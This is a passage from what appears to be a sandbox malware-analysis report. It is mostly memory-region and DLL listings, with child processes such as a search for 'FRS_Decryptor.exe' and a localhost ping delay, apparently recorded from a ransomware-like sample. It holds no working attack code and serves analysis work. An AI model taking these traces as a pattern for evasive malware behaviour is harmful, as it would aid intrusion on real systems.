"private_0x000000007e82d000" filename = "" Region: id = 7423 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7424 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7425 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7426 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7446 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 7447 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7448 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7449 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7463 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 7464 start_va = 0x290000 end_va = 0x293fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 7465 start_va = 0x2a0000 end_va = 0x2a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7466 start_va = 0x370000 end_va = 0x3edfff entry_point = 0x370000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7467 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 7468 start_va = 0x400000 end_va = 0x400fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7469 start_va = 0x410000 end_va = 0x410fff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 7470 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 7471 start_va = 0x430000 end_va = 0x430fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 7472 start_va = 0x440000 end_va = 0x440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 7473 start_va = 0x580000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 7474 start_va = 0x680000 end_va = 0x807fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 7475 start_va = 0x850000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 7476 start_va = 0x860000 end_va = 0x9e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 7477 start_va = 0x9f0000 end_va = 0x1deffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 7478 start_va = 0x1df0000 end_va = 0x1f31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001df0000" filename = "" Region: id = 7479 start_va = 0x1f40000 end_va = 0x2214fff entry_point = 0x1f40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7480 start_va = 0x2220000 end_va = 0x261bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002220000" filename = "" Region: id = 7481 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 7482 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 7483 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 7484 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 7485 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 7486 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 7487 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 7488 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 7489 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 7490 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 7491 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 7492 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7493 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7494 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7495 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7496 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7497 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7498 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 7499 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7500 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 7501 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7502 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 7503 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7504 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 7505 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7506 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7507 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7508 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 7509 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7510 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7511 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7512 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7513 start_va = 0x7e700000 end_va = 0x7e7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e700000" filename = "" Region: id = 7514 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 7515 start_va = 0x450000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 7516 start_va = 0x490000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 7517 start_va = 0x4e0000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 7518 start_va = 0x520000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 7519 start_va = 0x810000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 7520 start_va = 0x2620000 end_va = 0x265ffff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 7521 start_va = 0x73420000 end_va = 0x7342ffff entry_point = 0x73420000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 7522 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 7523 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 7524 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 7525 start_va = 0x7e6fd000 end_va = 0x7e6fffff entry_point = 0x0 region_type = private name = "private_0x000000007e6fd000" filename = "" Region: id = 7526 start_va = 0x7e827000 end_va = 0x7e829fff entry_point = 0x0 region_type = private name = "private_0x000000007e827000" filename = "" Region: id = 7527 start_va = 0x7e82a000 end_va = 0x7e82cfff entry_point = 0x0 region_type = private name = "private_0x000000007e82a000" filename = "" Region: id = 7528 start_va = 0x73370000 end_va = 0x7341afff entry_point = 0x73370000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Thread: id = 404 os_tid = 0x444 Thread: id = 406 os_tid = 0x8e4 Thread: id = 407 os_tid = 0x898 Thread: id = 408 os_tid = 0x884 Process: id = "145" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x13883000" os_pid = "0xbbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "143" os_parent_pid = "0x5e8" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7428 start_va = 0x2f0000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 7429 start_va = 0x310000 end_va = 0x311fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 7430 start_va = 0x320000 end_va = 0x32efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 7431 start_va = 0x330000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 7432 start_va = 0x370000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 7433 start_va = 0x3b0000 end_va = 0x3b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 7434 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 7435 start_va = 0x3d0000 end_va = 0x3d1fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 7436 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 7437 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7438 start_va = 0x7fd50000 end_va = 0x7fd72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fd50000" filename = "" Region: id = 7439 start_va = 0x7fd78000 end_va = 0x7fd78fff entry_point = 0x0 region_type = private name = "private_0x000000007fd78000" filename = "" Region: id = 7440 start_va = 0x7fd7a000 end_va = 0x7fd7cfff entry_point = 0x0 region_type = private name = "private_0x000000007fd7a000" filename = "" Region: id = 7441 start_va = 0x7fd7d000 end_va = 0x7fd7dfff entry_point = 0x0 region_type = private name = "private_0x000000007fd7d000" filename = "" Region: id = 7442 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7443 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7444 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7445 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7450 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 7451 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7452 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7453 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7454 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 7455 start_va = 0x3e0000 end_va = 0x45dfff entry_point = 0x3e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7456 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 7457 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 7458 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 7459 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7460 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7461 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7462 start_va = 0x7fc50000 end_va = 0x7fd4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fc50000" filename = "" Region: id = 7529 start_va = 0x300000 end_va = 0x303fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 7530 start_va = 0x310000 end_va = 0x313fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 7531 start_va = 0x73360000 end_va = 0x7336efff entry_point = 0x73360000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Thread: id = 405 os_tid = 0x81c Process: id = "146" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x62872000" os_pid = "0x8e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7532 start_va = 0x460000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7533 start_va = 0x480000 end_va = 0x481fff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 7534 start_va = 0x490000 end_va = 0x49efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 7535 start_va = 0x4a0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 7536 start_va = 0x4e0000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 7537 start_va = 0x520000 end_va = 0x523fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 7538 start_va = 0x530000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7539 start_va = 0x540000 end_va = 0x541fff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 7540 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 7541 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7542 start_va = 0x7eb40000 end_va = 0x7eb62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb40000" filename = "" Region: id = 7543 start_va = 0x7eb65000 end_va = 0x7eb65fff entry_point = 0x0 region_type = private name = "private_0x000000007eb65000" filename = "" Region: id = 7544 start_va = 0x7eb68000 end_va = 0x7eb68fff entry_point = 0x0 region_type = private name = "private_0x000000007eb68000" filename = "" Region: id = 7545 start_va = 0x7eb6d000 end_va = 0x7eb6ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb6d000" filename = "" Region: id = 7546 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7547 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7548 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7549 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7550 start_va = 0x6e0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 7551 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7552 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7553 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7554 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7555 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7556 start_va = 0x550000 end_va = 0x5cdfff entry_point = 0x550000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7557 start_va = 0x820000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 7558 start_va = 0xad0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 7559 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 7560 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 7561 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7562 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7563 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7564 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7565 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 7566 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7567 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7568 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7569 start_va = 